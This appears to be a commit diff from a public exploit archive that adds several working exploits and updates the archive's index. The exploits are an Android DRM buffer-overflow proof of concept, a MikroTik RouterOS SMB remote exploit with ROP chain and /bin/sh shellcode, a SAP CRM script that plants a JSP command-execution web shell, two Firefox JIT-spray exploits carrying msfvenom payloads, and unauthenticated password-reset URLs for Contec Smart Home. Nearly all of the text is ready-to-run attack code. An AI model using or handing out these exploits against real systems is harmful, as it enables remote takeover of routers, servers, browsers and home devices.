DB: 2018-03-17

6 changes to exploits/shellcodes

Android DRM Services - Buffer Overflow
MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow
SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution
Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution
Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution

Spring Data REST < 2.6.9 (Ingalls SR9)_ 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution
Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution
Contec Smart Home 4.15 - Unauthorized Password Reset
Offensive Security 2018-03-17 05:01:46 +00:00
parent 80a6e65803
commit b0fc7bfd43
7 changed files with 700 additions and 1 deletions


@ -0,0 +1,95 @@
#include <utils/StrongPointer.h>
#include <binder/IServiceManager.h>
#include <binder/MemoryHeapBase.h>
#include <binder/MemoryBase.h>
#include <binder/IMemory.h>
#include <media/ICrypto.h>
#include <media/IMediaDrmService.h>
#include <media/hardware/CryptoAPI.h>
#include <stdio.h>
#include <unistd.h>
using namespace android;
static sp<ICrypto> getCrypto()
{
sp<IServiceManager> sm = defaultServiceManager();
sp<IBinder> binder = sm->getService(String16("media.drm"));
sp<IMediaDrmService> service = interface_cast<IMediaDrmService>(binder);
if (service == NULL) {
fprintf(stderr, "Failed to retrieve 'media.drm' service.\n");
return NULL;
}
sp<ICrypto> crypto = service->makeCrypto();
if (crypto == NULL) {
fprintf(stderr, "makeCrypto failed.\n");
return NULL;
}
return crypto;
}
static bool setClearKey(sp<ICrypto> crypto)
{
// A UUID which identifies the ClearKey DRM scheme.
const uint8_t clearkey_uuid[16] = {
0x10, 0x77, 0xEF, 0xEC, 0xC0, 0xB2, 0x4D, 0x02,
0xAC, 0xE3, 0x3C, 0x1E, 0x52, 0xE2, 0xFB, 0x4B
};
if (crypto->createPlugin(clearkey_uuid, NULL, 0) != OK) {
fprintf(stderr, "createPlugin failed.\n");
return false;
}
return true;
}
#define DATA_SIZE (0x2000)
#define DEST_OFFSET (1)
static void executeOverflow()
{
// Get an interface to a remote CryptoHal object.
sp<ICrypto> crypto = getCrypto();
if (crypto == NULL) {
return;
}
if (!setClearKey(crypto)) {
return;
}
// From here we're done with the preparations and go into the
// vulnerability PoC.
sp<MemoryHeapBase> heap = new MemoryHeapBase(DATA_SIZE);
// This line is to merely show that we have full control over the data
// written in the overflow.
memset(heap->getBase(), 'A', DATA_SIZE);
sp<MemoryBase> sourceMemory = new MemoryBase(heap, 0, DATA_SIZE);
sp<MemoryBase> destMemory = new MemoryBase(heap, DATA_SIZE - DEST_OFFSET,
DEST_OFFSET);
int heapSeqNum = crypto->setHeap(heap);
if (heapSeqNum < 0) {
fprintf(stderr, "setHeap failed.\n");
return;
}
CryptoPlugin::Pattern pattern = { .mEncryptBlocks = 0, .mSkipBlocks = 1 };
ICrypto::SourceBuffer source = { .mSharedMemory = sourceMemory,
.mHeapSeqNum = heapSeqNum };
// mNumBytesOfClearData is the actual size of data to be copied.
CryptoPlugin::SubSample subSamples[] = { {
.mNumBytesOfClearData = DATA_SIZE, .mNumBytesOfEncryptedData = 0 } };
ICrypto::DestinationBuffer destination = {
.mType = ICrypto::kDestinationTypeSharedMemory, .mHandle = NULL,
.mSharedMemory = destMemory };
printf("decrypt result = %zd\n", crypto->decrypt(NULL, NULL,
CryptoPlugin::kMode_Unencrypted, pattern, source, 0, subSamples,
ARRAY_SIZE(subSamples), destination, NULL));
}
int main() {
executeOverflow();
return 0;
}


@ -0,0 +1,90 @@
#!/usr/bin/env python
import socket
import struct
import sys
import telnetlib
NETBIOS_SESSION_MESSAGE = "\x00"
NETBIOS_SESSION_REQUEST = "\x81"
NETBIOS_SESSION_FLAGS = "\x00"
# trick from http://shell-storm.org/shellcode/files/shellcode-881.php
# will place the socket file descriptor in eax
find_sock_fd = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48"
# dup stdin-stdout-stderr so we can reuse the existing connection
dup_fds = "\x89\xc3\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9"
# execve - cannot pass the 2nd arg as NULL or busybox will complain
execve_bin_sh = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
# build shellcode
shellcode = find_sock_fd + dup_fds + execve_bin_sh
# rop to mprotect and make the heap executable
# the heap base is not being subject to ASLR for whatever reason, so let's take advantage of it
p = lambda x : struct.pack('I', x)
rop = ""
rop += p(0x0804c39d) # 0x0804c39d: pop ebx; pop ebp; ret;
rop += p(0x08072000) # ebx -> heap base
rop += p(0xffffffff) # ebp -> gibberish
rop += p(0x080664f5) # 0x080664f5: pop ecx; adc al, 0xf7; ret;
rop += p(0x14000) # ecx -> size for mprotect
rop += p(0x08066f24) # 0x08066f24: pop edx; pop edi; pop ebp; ret;
rop += p(0x00000007) # edx -> permissions for mprotect -> PROT_READ | PROT_WRITE | PROT_EXEC
rop += p(0xffffffff) # edi -> gibberish
rop += p(0xffffffff) # ebp -> gibberish
rop += p(0x0804e30f) # 0x0804e30f: pop ebp; ret;
rop += p(0x0000007d) # ebp -> mprotect system call
rop += p(0x0804f94a) # 0x0804f94a: xchg eax, ebp; ret;
rop += p(0xffffe42e) # 0xffffe42e; int 0x80; pop ebp; pop edx; pop ecx; ret - from vdso - not affected by ASLR
rop += p(0xffffffff) # ebp -> gibberish
rop += p(0x0) # edx -> zeroed out
rop += p(0x0) # ecx -> zeroed out
rop += p(0x0804e30f) # 0x0804e30f: pop ebp; ret;
rop += p(0x08075802) # ebp -> somewhere on the heap that will (always?) contain user controlled data
rop += p(0x0804f94a) # 0x0804f94a: xchg eax, ebp; ret;
rop += p(0x0804e153) # jmp eax; - jump to our shellcode on the heap
offset_to_regs = 83
# we do not really care about the initial register values other than overwriting the saved ret address
ebx = p(0x45454545)
esi = p(0x45454545)
edi = p(0x45454545)
ebp = p(0x45454545)
eip = p(0x0804886c) # 0x0804886c: ret;
payload = "\xff" * offset_to_regs + ebx + esi + edi + ebp + eip + rop
header = struct.pack("!ccH", NETBIOS_SESSION_REQUEST, NETBIOS_SESSION_FLAGS, len(payload))
buf = header + payload
def open_connection(ip):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 139))
return s
def store_payload(s):
print "[+] storing payload on the heap"
s.send((NETBIOS_SESSION_MESSAGE + "\x00\xeb\x02") * 4000 + "\x90" * 16 + shellcode)
def crash_smb(s):
print "[+] getting code execution"
s.send(buf)
if __name__ == "__main__":
if len(sys.argv) != 2:
print "%s ip" % sys.argv[0]
sys.exit(1)
s = open_connection(sys.argv[1])
store_payload(s)
# the server closes the first connection, so we need to open another one
t = telnetlib.Telnet()
t.sock = open_connection(sys.argv[1])
crash_smb(t.sock)
print "[+] got shell?"
t.interact()


@ -0,0 +1,30 @@
# Title : Contec smart home 4.15 Unauthorized Password Reset
# Shodan Dork : "content/smarthome.php"
# Vendor Homepage : http://contec.co.il
# Tested on : Google Chrome
# Tested version : 4.15
# Date : 2018-03-14
# Author : Z3ro0ne
# Contact : saadousfar59@gmail.com
# Facebook Page : https://www.facebook.com/Z3ro0ne
# Vulnerability description :
the Vulnerability allow unauthenticated attacker to remotely bypass authentication and change admin password without old password and control (lamps,doors,air conditioner...)
# Exploit
To Reset Admin password
http://Ipaddress:port/content/new_user.php?user_name=ADMIN&password=NEWPASSWORD&group_id=1
To Create a new user
http://Ipaddress:port/content/new_user.php?user_name=NEWUSER&password=NEWPASSWORD&group_id=1
To edit a user
http://Ipaddress:port/content/edit_user.php?user_name=USER&password=NEWPASSWORD&group_id=1
To Delete a user
http://Ipaddress:port/content/delete_user.php?user_name=USER
Users list
http://Ipaddress:port/content/user.php

141
exploits/windows/remote/44292.py Executable file

@ -0,0 +1,141 @@
#!/usr/bin/env python
import argparse
import urllib
import requests, random
from bs4 import BeautifulSoup
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
help_desc = '''
PoC of Remote Command Execution via Log injection on SAP CRM
-- ERPScan
python crm_rce.py --ssl --host 127.0.0.1 --port 50000 --username administrator --password 06071992 --SID DM0 --ssl true
'''
baner = '''
_______ _______ _______ _______ _______ _______ _
( ____ \( ____ )( ____ )( ____ \( ____ \( ___ )( ( /|
| ( \/| ( )|| ( )|| ( \/| ( \/| ( ) || \ ( |
| (__ | (____)|| (____)|| (_____ | | | (___) || \ | |
| __) | __)| _____)(_____ )| | | ___ || (\ \) |
| ( | (\ ( | ( ) || | | ( ) || | \ |
| (____/\| ) \ \__| ) /\____) || (____/\| ) ( || ) \ |
(_______/|/ \__/|/ \_______)(_______/|/ \||/ )_)
Vahagn @vah_13 Vardanian
Bob @NewFranny
CVE-2018-2380
'''
def start(ip, port, username, password, sid, ssl):
if ssl == None:
base_scheme = 'http'
else:
base_scheme = 'https'
req_adapter = requests.session()
_server_ip_port = "{0}:{1}".format(ip, port)
_username = username
admin_password = password
_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Referer": "{0}://{1}/b2b/admin/logging.jsp?location=com.sap.isa&mode=edit&index=1".format(
base_scheme,_server_ip_port)
}
# shell name
_shell_name = "ERPScan_shell_{0}".format(random.randint(1337, 31337))
# shell_code
shell_code = '''
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
'''
# urls variables
_irj_portal = "{0}://{1}/irj/portal".format(base_scheme,_server_ip_port)
_b2b_admin_url = "{0}://{1}/b2b/admin/index.jsp".format(base_scheme,_server_ip_port)
_url_of_log_path = "{0}://{1}/b2b/admin/logging.jsp".format(base_scheme,_server_ip_port)
_url_write_shell_to_log_file = "{0}://{1}/b2b/init.do?\"%22]{2}[%22\"".format(base_scheme,_server_ip_port,urllib.quote_plus(shell_code))
# data variable
_post_data_restore_log_path = {"selConfigName": "com.sap.isa",
"selSeverity": "0",
"selDest": "./default_log_name.log",
"selLimit": "10485760",
"selCount": "20",
"selFormatterType": "ListFormat",
"selPattern": "none",
"mode": "save",
"selLocationIdx": "1"}
_post_data_to_change_log_path = {"selConfigName": "com.sap.isa",
"selSeverity": "0",
"selDest": "C:\\usr\\sap\\{0}\\J00\\j2ee\\cluster\\apps\\sap.com\\com.sap.engine.docs.examples\\servlet_jsp\\_default\\root\\{1}.jsp".format(sid, _shell_name),
"selLimit": "10485760",
"selCount": "20",
"selFormatterType": "ListFormat",
"selPattern": "none",
"mode": "save",
"selLocationIdx": "1"}
print("{0} \n[!] Try to get RCE using log injection ".format(baner))
print("[!] Get j_salt token for requests")
res = requests.get(_irj_portal, headers=_headers, verify=False)
soup = BeautifulSoup(res.text, "html.parser")
e = soup.find("input", {"name": "j_salt"})
__j_salt = e['value']
print("[!] Login to the SAP portal")
req_adapter.post(_b2b_admin_url,
headers=_headers,
data={"login_submit": "on", "login_do_redirect": "1", "j_salt": __j_salt,
"j_username": "{0}".format(_username), "j_password": "{0}".format(admin_password),
"uidPasswordLogon": "Log On"}, verify=False)
print("[!] Change log path ")
req_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_to_change_log_path)
print("[!] Upload \"Runtime.getRuntime().exec(request.getParameter(\"cmd\")) \" shell to {0}://{1}/{2}.0.jsp?cmd=ipconfig".format(base_scheme,_server_ip_port, _shell_name))
req_adapter.get(_url_write_shell_to_log_file, headers=_headers)
print("[!] Restore logs path to ./default_log_name.log")
req_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_restore_log_path)
print("[!] Enjoy!")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=help_desc, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('-H', '--host', default='127.0.0.1', help='SAP host to send requests to')
parser.add_argument('-p', '--port', default=50000, type=int, help='SAP host port')
parser.add_argument('-u', '--username', help='SAP CRM administrator')
parser.add_argument('-pwd', '--password', help='SAP CRM administrator password')
parser.add_argument('-s', '--SID', help='SAP SID')
parser.add_argument('-S', '--ssl', help='Use ssl connection')
args = parser.parse_args()
args_dict = vars(args)
host = args_dict['host']
port = args_dict['port']
username = args_dict['username']
password = args_dict['password']
sid = args_dict['SID']
ssl = args.ssl
start(host, port, username, password, sid, ssl)


@ -0,0 +1,165 @@
<!DOCTYPE HTML>
<!--
FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
*PoC* Exploit against Firefox 46.0.1 (CVE-2016-2819)
ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018
Tested on:
Firefox 46.0.1 32-bit - Windows 10 1709
https://ftp.mozilla.org/pub/firefox/releases/46.0.1/win32/en-US/Firefox%20Setup%2046.0.1.exe
Howto:
1) serve PoC over network and open it in Firefox 46.0.1 32-bit
2) A successfull exploit attempt should pop calc.exe
Mozilla Bug Report:
https://bugzilla.mozilla.org/show_bug.cgi?id=1270381
Writeup:
https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/
- For research purposes only -
(C) Rh0
Mar. 13, 2018
-->
<title>CVE-2016-2819 and ASM.JS JIT-Spray</title>
<head>
<meta charset=UTF-8 />
<script>
"use strict"
var Exploit = function(){
this.asmjs = new Asmjs()
this.heap = new Heap()
}
Exploit.prototype.go = function(){
/* target address of fake node object */
var node_target_addr = 0x5a500000
/* target address of asm.js float pool payload*/
var target_eip = 0x20200b58
/* spray asm.js float constant pools */
this.asmjs.spray_float_payload(0x1000)
/* spray fake Node objects */
this.heap.spray(node_target_addr, target_eip)
/* go! */
this.trigger_vuln(node_target_addr)
};
Exploit.prototype.trigger_vuln = function(node_ptr){
document.body.innerHTML = '<table><svg><div id="BBBB">'
this.heap.gc()
var a = new Array()
for (var i=0; i < 0x10100; i++){
/* array element (Node object ptr) control with integer underflow */
a[i] = new Uint32Array(0x100/4)
for (var j=0; j<0x100/4; j++)
a[i][j] = node_ptr
}
/* original crashing testcase
document.getElementById('BBBB').outerHTML = '<tr><title><ruby><template><table><template><td><col><em><table></tr><th></tr></td></table>hr {}</style>'
*/
/* easier to exploit codepath */
document.getElementById('BBBB').outerHTML = '<tr><title><ruby><template><table><template><td><col><em><table></tr><th></tr></td></table>hr {}<DD>'
window.location.reload()
};
var Asmjs = function(){};
Asmjs.prototype.asm_js_module = function(stdlib, ffi){
"use asm"
var foo = ffi.foo
function payload(){
var val = 0.0
/* Fx 46.0.1 float constant pool of size 0xc0 is at 0xXXXX0b58*/
val = +foo(
// $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py
-1.587865768352248e-263,
-8.692422460804815e-255,
7.529882109376901e-114,
2.0120602207293977e-16,
3.7204662687249914e-242,
4.351158092040946e+89,
2.284741716118451e+270,
7.620699014501263e-153,
5.996021286047645e+44,
-5.981935902612295e-92,
6.23540918304361e+259,
1.9227873281657598e+256,
2.0672493951546363e+187,
-6.971032919585734e+91,
5.651413300798281e-134,
-1.9040061366251406e+305,
-1.2687640718807038e-241,
9.697849844423e-310,
-2.0571400761625145e+306,
-1.1777948610587587e-123,
2.708909852013898e+289,
3.591750823735296e+37,
-1.7960516725035723e+106,
6.326776523166028e+180
)
return +val;
}
return payload
};
Asmjs.prototype.spray_float_payload = function(regions){
this.modules = new Array(regions).fill(null).map(
region => this.asm_js_module(window, {foo: () => 0})
)
};
var Heap = function(target_addr, eip){
this.node_heap = []
};
Heap.prototype.spray = function(node_target_addr, target_eip){
var junk = 0x13371337
var current_address = 0x20000000
var block_size = 0x1000000
while(current_address < node_target_addr){
var fake_objects = new Uint32Array(block_size/4 - 0x100)
for (var offset = 0; offset < block_size; offset += 0x100000){
/* target Node object needed to control EIP */
fake_objects[offset/4 + 0x00/4] = 0x29
fake_objects[offset/4 + 0x0c/4] = 3
fake_objects[offset/4 + 0x14/4] = node_target_addr + 0x18
fake_objects[offset/4 + 0x18/4] = 1
fake_objects[offset/4 + 0x1c/4] = junk
fake_objects[offset/4 + 0x20/4] = node_target_addr + 0x24
fake_objects[offset/4 + 0x24/4] = node_target_addr + 0x28
fake_objects[offset/4 + 0x28/4] = node_target_addr + 0x2c
fake_objects[offset/4 + 0x2c/4] = target_eip
}
this.node_heap.push(fake_objects)
current_address += block_size
}
};
Heap.prototype.gc = function(){
for (var i=0; i<=10; i++)
var x = new ArrayBuffer(0x1000000)
};
</script>
<head>
<body onload='exploit = new Exploit(); exploit.go()' />


@ -0,0 +1,172 @@
<!DOCTYPE HTML>
<!--
FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
*PoC* Exploit against Firefox 44.0.2 (CVE-2016-1960)
ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018
Tested on:
Firefox 44.0.2 32-bit - Windows 10 1709
https://ftp.mozilla.org/pub/firefox/releases/44.0.2/win32/en-US/Firefox%20Setup%2044.0.2.exe
Howto:
1) serve PoC over network and open it in Firefox 44.0.2 32-bit
2) A successfull exploit attempt should pop calc.exe
Mozilla Bug Report:
https://bugzilla.mozilla.org/show_bug.cgi?id=1246014
Writeup:
https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/
- For research purposes only -
(C) Rh0
Mar. 13, 2018
Notes:
*) very similar to CVE-2016-2819, but still different:
*) this PoC (CVE-2016-1960) does trigger in 44.0.2 but not in 46.0.1
because in 46.0.1 it is already fixed.
*) CVE-2016-2819 does trigger the same bug in 44.0.2 and 46.0.1 because it
was fixed in Firefox > 46.0.1
-->
<title>CVE-2016-1960 and ASM.JS JIT-Spray</title>
<head>
<meta charset=UTF-8 />
<script>
"use strict"
var Exploit = function(){
this.asmjs = new Asmjs()
this.heap = new Heap()
}
Exploit.prototype.go = function(){
/* target address of fake node object */
var node_target_addr = 0x20200000
/* target address of asm.js float pool payload*/
var target_eip = 0x3c3c1dc8
/* spray fake Node objects */
this.heap.spray(node_target_addr, target_eip)
/* spray asm.js float constant pools */
this.asmjs.spray_float_payload(0x1800)
/* go! */
this.trigger_vuln(node_target_addr)
};
Exploit.prototype.trigger_vuln = function(node_ptr){
document.body.innerHTML = '<table><svg><div id="AAAA">'
this.heap.gc()
var a = new Array()
for (var i=0; i < 0x11000; i++){
/* array element (Node object ptr) control with integer underflow */
a[i] = new Uint32Array(0x100/4)
for (var j=0; j<0x100/4; j++)
a[i][j] = node_ptr
}
/* original crashing testcase
document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td</style>';
*/
/* easier to exploit codepath */
document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td<DD>';
window.location.reload()
};
var Asmjs = function(){};
Asmjs.prototype.asm_js_module = function(stdlib, ffi){
"use asm"
var foo = ffi.foo
function payload(){
var val = 0.0
/* Fx 44.0.2 float constant pool of size 0xc0 is at 0xXXXX1dc8*/
val = +foo(
// $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py
-1.587865768352248e-263,
-8.692422460804815e-255,
7.529882109376901e-114,
2.0120602207293977e-16,
3.7204662687249914e-242,
4.351158092040946e+89,
2.284741716118451e+270,
7.620699014501263e-153,
5.996021286047645e+44,
-5.981935902612295e-92,
6.23540918304361e+259,
1.9227873281657598e+256,
2.0672493951546363e+187,
-6.971032919585734e+91,
5.651413300798281e-134,
-1.9040061366251406e+305,
-1.2687640718807038e-241,
9.697849844423e-310,
-2.0571400761625145e+306,
-1.1777948610587587e-123,
2.708909852013898e+289,
3.591750823735296e+37,
-1.7960516725035723e+106,
6.326776523166028e+180
)
return +val;
}
return payload
};
Asmjs.prototype.spray_float_payload = function(regions){
this.modules = new Array(regions).fill(null).map(
region => this.asm_js_module(window, {foo: () => 0})
)
};
var Heap = function(target_addr, eip){
this.node_heap = []
};
Heap.prototype.spray = function(node_target_addr, target_eip){
var junk = 0x13371337
var current_address = 0x08000000
var block_size = 0x1000000
while(current_address < node_target_addr){
var fake_objects = new Uint32Array(block_size/4 - 0x100)
for (var offset = 0; offset < block_size; offset += 0x100000){
/* target Node object needed to control EIP */
fake_objects[offset/4 + 0x00/4] = 0x29
fake_objects[offset/4 + 0x0c/4] = 3
fake_objects[offset/4 + 0x14/4] = node_target_addr + 0x18
fake_objects[offset/4 + 0x18/4] = 1
fake_objects[offset/4 + 0x1c/4] = junk
fake_objects[offset/4 + 0x20/4] = node_target_addr + 0x24
fake_objects[offset/4 + 0x24/4] = node_target_addr + 0x28
fake_objects[offset/4 + 0x28/4] = node_target_addr + 0x2c
fake_objects[offset/4 + 0x2c/4] = target_eip
}
this.node_heap.push(fake_objects)
current_address += block_size
}
};
Heap.prototype.gc = function(){
for (var i=0; i<=10; i++)
var x = new ArrayBuffer(0x1000000)
};
</script>
<head>
<body onload='exploit = new Exploit(); exploit.go()' />

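--- a/<csv-path-not-shown-on-page>
+++ b/<csv-path-not-shown-on-page>
@@ -5900,6 +5900,7 @@ id,file,description,date,author,type,platform,port
 44265,exploits/linux/dos/44265.py,"Memcached 1.5.5 - 'Memcrashed ' Insufficient Control of Network Message Volume Denial of Service With Shodan API",2018-03-08,649,dos,linux,11211
 44268,exploits/android/dos/44268.txt,"Broadcom BCM43xx Wi-Fi - 'BroadPWN' Denial of Service",2016-12-01,649,dos,android,
 44271,exploits/windows/dos/44271.py,"WebLog Expert Enterprise 9.4 - Denial of Service",2018-03-09,hyp3rlinx,dos,windows,
+44291,exploits/android/dos/44291.cpp,"Android DRM Services - Buffer Overflow",2018-03-15,"Tamir Zahavi-Brunner",dos,android,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -16324,6 +16325,10 @@ id,file,description,date,author,type,platform,port
 44280,exploits/multiple/remote/44280.rb,"Eclipse Equinoxe OSGi Console - Command Execution (Metasploit)",2018-03-12,Metasploit,remote,multiple,
 44283,exploits/hardware/remote/44283.py,"MikroTik RouterOS < 6.38.4 (MIPSBE) - 'Chimay Red' Stack Clash Remote Code Execution",2018-03-12,"Lorenzo Santina",remote,hardware,
 44284,exploits/hardware/remote/44284.py,"MikroTik RouterOS < 6.38.4 (x86) - 'Chimay Red' Stack Clash Remote Code Execution",2018-03-12,"Lorenzo Santina",remote,hardware,
+44290,exploits/hardware/remote/44290.py,"MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow",2018-03-15,CoreLabs,remote,hardware,
+44292,exploits/windows/remote/44292.py,"SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution",2018-03-14,"erp scan team",remote,windows,
+44293,exploits/windows/remote/44293.html,"Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows,
+44294,exploits/windows/remote/44294.html,"Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39001,4 +39006,5 @@ id,file,description,date,author,type,platform,port
 44285,exploits/aspx/webapps/44285.txt,"SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities",2018-03-13,"SEC Consult",webapps,aspx,
 44286,exploits/php/webapps/44286.txt,"Tuleap 9.17.99.189 - Blind SQL Injection",2018-03-13,"Cristiano Maruti",webapps,php,
 44288,exploits/php/webapps/44288.txt,"WordPress Plugin Duplicator 1.2.32 - Cross-Site Scripting",2018-03-15,"Stefan Broeder",webapps,php,80
-44289,exploits/java/webapps/44289.java,"Spring Data REST < 2.6.9 (Ingalls SR9)_ 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution",2018-03-15,"Antonio Francesco Sardella",webapps,java,
+44289,exploits/java/webapps/44289.java,"Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution",2018-03-15,"Antonio Francesco Sardella",webapps,java,
+44295,exploits/hardware/webapps/44295.txt,"Contec Smart Home 4.15 - Unauthorized Password Reset",2018-03-16,Z3ro0ne,webapps,hardware,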
